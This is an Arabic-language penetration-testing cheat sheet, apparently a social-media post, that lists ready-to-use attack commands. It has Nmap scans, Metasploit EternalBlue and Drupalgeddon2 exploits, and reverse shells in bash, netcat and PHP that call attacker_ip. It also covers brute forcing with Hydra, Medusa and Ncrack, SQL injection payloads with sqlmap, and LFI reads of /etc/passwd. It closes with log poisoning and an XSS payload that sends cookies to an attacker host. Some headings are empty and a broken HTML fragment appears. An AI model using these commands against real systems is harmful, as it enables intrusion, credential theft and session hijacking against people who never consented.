🧙‍♂️ دليل السحرة لاختبار اختراق المواقع والسيرفرات ✨

🧠 جمع المعلومات (Information Gathering)

أوامر وأمثلة مع الشرح:

🔍 تحليل البورتات والخدمات (Port Scanning)

أوامر Nmap الأكثر استخدامًا:

مثال عملي:

nmap -sS -sV -O -p 21,22,80 target

🔐 الدخول عبر SSH/FTP

الدخول بخدمات FTP وSSH:

ftp target_ip
Name: anonymous
Password: anonymous

أو SSH إذا عُرفت بيانات الدخول:

ssh username@target_ip

إذا لديك مفتاح خاص:

ssh -i id_rsa username@target_ip

💣 استغلال الثغرات (Exploitation)

أدوات شائعة:

مثال باستخدام EternalBlue:

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target_ip
run

🌀 تنفيذ Reverse Shell

أنواع Reverse Shell مع الأمثلة:

باستخدام Bash:

bash -i >& /dev/tcp/attacker_ip/4444 0>&1

باستخدام Netcat:

nc -e /bin/bash attacker_ip 4444

باستخدام PHP:

php -r '$sock=fsockopen("attacker_ip",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

لا تنسَ تشغيل listener قبل التنفيذ:

nc -lvnp 4444

🔎 بعد الدخول (Post Exploitation)

خطوات ضرورية بعد الوصول:

curl -Ls https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | bash

⚔️ تصعيد الصلاحيات (Privilege Escalation)

طرق التصعيد الشائعة:

استخدم موقع GTFOBins لاستغلال أوامر عادية لتصعيد الصلاحيات.

🔑 تخمين كلمات المرور (Brute Forcing)

أدوات وأمثلة:

Hydra:

hydra -l admin -P rockyou.txt ssh://target_ip

Medusa:

medusa -h target_ip -u admin -P passwords.txt -M ssh

Ncrack:

ncrack -p 22 -U users.txt -P passwords.txt target_ip

📜 البحث عن CVE

طرق البحث عن الثغرات:

🧨 موسوعة SQL Injection

أنواع وأساليب SQLi:

أمثلة:

' OR 1=1 --
admin' --
1 UNION SELECT null,null,null
1 AND ASCII(SUBSTRING((SELECT database()),1,1))=115
' OR SLEEP(5) --

أداة sqlmap:

sqlmap -u "http://target.com/page.php?id=1" --dbs
sqlmap -u "http://target.com/page.php?id=1" --tables -D database_name

🧠 Metasploit - أمثلة عملية

مثال عملي على استغلال ثغرة:

msfconsole
search drupal
use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS target_ip
run

مثال على استغلال EternalBlue:

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target_ip
run

🚪 أمثلة على تجاوز البورتات (Service Abuse)

التعامل مع بروتوكولات معروفة:

ftp target_ip
smbclient -L \\target_ip\ -N
hydra -l root -P rockyou.txt ssh://target_ip

🧰 أدوات ضرورية

div class="section">

🔎 14. ثغرة LFI (Local File Inclusion) مع استغلالها

ما هي LFI: ثغرة تسمح بقراءة أو تضمين ملفات النظام عبر التلاعب بالروابط.

أمثلة عملية:

http://target.com/index.php?page=../../../../etc/passwd
http://target.com/index.php?page=../../../../proc/self/environ

استغلال لقراءة ملفات حساسة:

باستخدام هكر بار (Hackbar) لإرسال طلب LFI:

  1. ثبت إضافة Hackbar على المتصفح.
  2. اذهب للموقع المستهدف وافتح Hackbar.
  3. اكتب الرابط:
http://target.com/index.php?page=../../../../etc/passwd
  1. اضغط "Execute" لرؤية النتيجة.

اختطاف الكوكيز باستخدام LFI:

إذا كان بالإمكان تضمين ملفات اللوج أو ملفات تحوي بيانات، يمكنك زرع كود باللوج وأخذه عبر LFI.

GET /index.php?page=../../../../var/log/apache2/access.log HTTP/1.1

مثال عملي:

GET / HTTP/1.1
User-Agent: <script>document.location='http://attacker_ip/cookie?c='+document.cookie;</script>

تابعني لمزيد من الشروحات الاحترافية ✨

Instagram @txp__p TryHackMe A91 (TryHackMe)